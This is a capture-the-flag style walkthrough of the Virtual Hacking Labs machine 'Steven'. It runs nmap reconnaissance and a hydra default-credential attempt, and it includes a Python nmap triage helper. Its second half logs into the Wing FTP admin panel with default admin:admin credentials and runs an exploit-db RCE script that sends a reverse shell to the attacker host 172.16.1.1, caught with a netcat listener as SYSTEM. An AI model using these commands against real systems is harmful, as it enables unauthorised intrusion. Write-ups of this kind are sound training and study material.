
VHL — Steven

Wing FTP Server on Windows. Default admin credentials allow access to the web admin panel, leading to command execution via scheduled tasks.

February 10, 2025, Virtual Hacking Labs
#Wing FTP #Default Creds #FTP #Scheduled Tasks

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.36
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 18:28 EST
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 53.85% done; ETC: 18:28 (0:00:14 remaining)
Nmap scan report for 10.11.1.36
Host is up (0.021s latency).
Not shown: 62919 closed tcp ports (reset), 2603 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Wing FTP Server
80/tcp   open  http         Wing FTP Server(Ferdi Bak)
|_http-server-header: Wing FTP Server(Ferdi Bak)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not found
|     Server: Wing FTP Server(Ferdi Bak)
|     Cache-Control: private
|     Content-Type: application/octet-stream
|     Content-Length: 0
|     Connection: close
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.0 200 HTTP OK
|     Server: Wing FTP Server(Ferdi Bak)
|     Cache-Control: private
|     Content-Type: text/html
|     Content-Length: 316
|     Connection: close
|     <noscript><center><H2>The web client requires that you have Javascript enabled on your browser.<br>If you're not sure how to do this, <a href='help_javascript.htm'>click here.</a></H2></center></noscript>
|_    <meta http-equiv='Content-Type' content='text/html; charset=utf-8'><script>top.location='login.html';</script>
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
1025/tcp open  msrpc        Microsoft Windows RPC
1026/tcp open  msrpc        Microsoft Windows RPC
1027/tcp open  msrpc        Microsoft Windows RPC
1028/tcp open  msrpc        Microsoft Windows RPC
1033/tcp open  msrpc        Microsoft Windows RPC
1034/tcp open  msrpc        Microsoft Windows RPC
5357/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5466/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.0 200 HTTP OK
|     Server: Wing FTP Server(Ferdi Bak)
|     Cache-Control: private
|     Content-Type: text/html
|     Content-Length: 338
|     Connection: close
|     <meta http-equiv='Content-Type' content='text/html; charset=utf-8'><script>top.location='admin_login.html';</script>
|_    <noscript><center><H2>The administration interface requires that you have Javascript enabled on your browser. <br>If you're not sure how to do this, <a href='help_javascript.htm'>click here.</a> </H2></center></noscript>
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
[SF service fingerprint strings for ports 80 and 5466 omitted]
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
[OS fingerprint omitted]

Network Distance: 2 hops
Service Info: Host: STEVEN-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h40m01s, deviation: 4h37m07s, median: 1s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: STEVEN-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ac:b8:6e (VMware)
| smb2-time: 
|   date: 2025-02-10T23:30:45
|_  start_date: 2025-02-10T22:26:25
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: steven-PC
|   NetBIOS computer name: STEVEN-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-02-10T15:30:44-08:00

TRACEROUTE
HOP RTT      ADDRESS
1   21.10 ms 10.11.1.36

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 183.71 seconds
```

21

```sh
21/tcp   open  ftp          Wing FTP Server
```

Anonymous login is rejected:

```sh
ftp anonymou@10.11.1.36
Connected to 10.11.1.36.
220 Wing FTP Server ready...
331 Password required for anonymou
Password: 
530 Not logged in,password error.
ftp: Login failed
ftp> ls
530 Please log in with USER and PASS first.
530 Please log in with USER and PASS first.
ftp: Can't bind for data connection: Address already in use
ftp> exit
530 Please log in with USER and PASS first.
```

A default-credential list against the FTP service itself finds nothing either:

```sh
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://10.11.1.36
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-10 18:36:04
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking ftp://10.11.1.36:21/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-10 18:36:06
```

80

```sh
80/tcp   open  http         Wing FTP Server(Ferdi Bak)
|_http-server-header: Wing FTP Server(Ferdi Bak)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not found
|     Server: Wing FTP Server(Ferdi Bak)
|     Cache-Control: private
|     Content-Type: application/octet-stream
|     Content-Length: 0
|     Connection: close
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.0 200 HTTP OK
|     Server: Wing FTP Server(Ferdi Bak)
|     Cache-Control: private
|     Content-Type: text/html
|     Content-Length: 316
|     Connection: close
|     <noscript><center><H2>The web client requires that you have Javascript enabled on your browser.<br>If you're not sure how to do this, <a href='help_javascript.htm'>click here.</a></H2></center></noscript>
|_    <meta http-equiv='Content-Type' content='text/html; charset=utf-8'><script>top.location='login.html';</script>
|_http-title: Site doesn't have a title (text/html).
```

445

```sh
445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```

A null session is accepted but exposes no shares:

```sh
smbclient -N -L \\\\10.11.1.36
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.11.1.36 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

5466

Same Wing FTP server header as port 80, but this one redirects to admin_login.html: it is the administration interface.

```sh
5466/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.0 200 HTTP OK
|     Server: Wing FTP Server(Ferdi Bak)
|     Cache-Control: private
|     Content-Type: text/html
|     Content-Length: 338
|     Connection: close
|     <meta http-equiv='Content-Type' content='text/html; charset=utf-8'><script>top.location='admin_login.html';</script>
|_    <noscript><center><H2>The administration interface requires that you have Javascript enabled on your browser. <br>If you're not sure how to do this, <a href='help_javascript.htm'>click here.</a> </H2></center></noscript>
```

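Added example, not part of the original writeup: a small Python triage script that parses nmap's normal output (the format shown in the scan above) and flags the three exposures this box turns on, the Wing FTP administration interface (the admin_login.html redirect on 5466) as distinct from the ordinary web client on 80, the end-of-life Windows 7 host, and SMB signing being disabled. The embedded SAMPLE_NMAP is a constructed, trimmed excerpt of the scan output above.

```python
import re
# Constructed, trimmed excerpt of this page's nmap output (normal output format).
SAMPLE_NMAP = """\
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Wing FTP Server
80/tcp   open  http         Wing FTP Server(Ferdi Bak)
|_    <meta http-equiv='Content-Type' content='text/html; charset=utf-8'><script>top.location='login.html';</script>
445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5466/tcp open  unknown
|     Server: Wing FTP Server(Ferdi Bak)
|_    <meta http-equiv='Content-Type' content='text/html; charset=utf-8'><script>top.location='admin_login.html';</script>
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+/tcp)\s+open\s+(\S+)\s*(.*)$")

def parse_sections(text):
    """Group nmap lines into {"21/tcp": [...], ..., "host": [...]}: the port line plus its script output."""
    sections, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = m.group(1)
            sections[current] = [m.group(2) + " " + m.group(3)]
        elif line.startswith("Host script results"):
            current = "host"
            sections[current] = []
        elif line.startswith("|") and current is not None:
            sections[current].append(line.lstrip("|_ ").strip())
        else:
            current = None  # any other line (blank, Service Info, ...) ends the section
    return sections

def triage(text):
    """Return (section, finding) pairs for the exposures this writeup chains together."""
    findings = []
    for key, lines in parse_sections(text).items():
        blob = " ".join(lines)
        if "Wing FTP Server" in blob:
            # admin_login.html marks the administration panel: default admin credentials and scheduled tasks live there
            kind = "admin interface" if "admin_login.html" in blob else "web client" if "login.html" in blob else "service"
            findings.append((key, f"Wing FTP {kind} exposed"))
        if "Windows 7" in blob:
            findings.append((key, "end-of-life Windows 7 host"))
        if "message_signing: disabled" in blob:
            findings.append((key, "SMB signing disabled"))
    return findings
```

Run it on a full `nmap -sV -sC` normal-output file instead of SAMPLE_NMAP and the same five finding types come out, keyed by port or by the host-script section.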
default credentials

The administration interface on port 5466 accepts admin:admin.

Wing FTP Server 4.3.8

Wing FTP Server 4.3.8 - Remote Code Execution (RCE) (Authenticated)

  • https://www.exploit-db.com/exploits/50720
```sh
mv /home/sake/Downloads/50720.py ./
```

```sh
python3 50720.py 10.11.1.36 5466 172.16.1.1 1234 admin admin

          .--.
         / ,~a`-,
         \ \_.-"`
          ) (        __      __ .__            ____      __________ _________  ___________
        ,/ ."\      /  \    /  \|__|  ____    / ___\     \______   \\_   ___ \ \_   _____/
       /  (  |      \   \/\/   /|  | /    \  / /_/  >     |       _//    \  \/  |    __)_
      /   )  ;       \        / |  ||   |  \ \___  /      |    |   \\     \____ |        \
     /   /  /         \__/\  /  |__||___|  //_____/       |____|_  / \______  //_______  /
   ,/_."` /`               \/            \/                      \/         \/         \/
    /_/\ |___
       `~~~~~`

Login successful - Cookie: UIDADMIN=83a189e6...
The payload has been sent. Check your listener.
```

The shell comes back as nt authority\system straight away: the Wing FTP service is running as SYSTEM, so no privilege escalation step is needed.

```sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.36] 1084
whoami
nt authority\system
```

```powershell
PS C:\Windows\system32> cd C:\users\administrator
PS C:\users\administrator> ls


    Directory: C:\users\administrator


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d-r--         5/22/2017   3:22 AM            Contacts
d-r--         5/22/2017   3:23 AM            Desktop
d-r--         5/22/2017   3:22 AM            Documents
d-r--         5/22/2017   3:22 AM            Downloads
d-r--         5/22/2017   3:22 AM            Favorites
d-r--         5/22/2017   3:22 AM            Links
d-r--         5/22/2017   3:22 AM            Music
d-r--         5/22/2017   3:22 AM            Pictures
d-r--         5/22/2017   3:22 AM            Saved Games
d-r--         5/22/2017   3:22 AM            Searches
d-r--         5/22/2017   3:22 AM            Videos


PS C:\users\administrator> cd Desktop
PS C:\users\administrator\Desktop> ls


    Directory: C:\users\administrator\Desktop


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         5/22/2017   3:24 AM         20 key.txt.txt


PS C:\users\administrator\Desktop> cat key.txt.txt
t70m5jaco2zy9vhqlb6s
PS C:\users\administrator\Desktop> whoami
nt authority\system
PS C:\users\administrator\Desktop> date

Monday, February 10, 2025 3:50:58 PM
```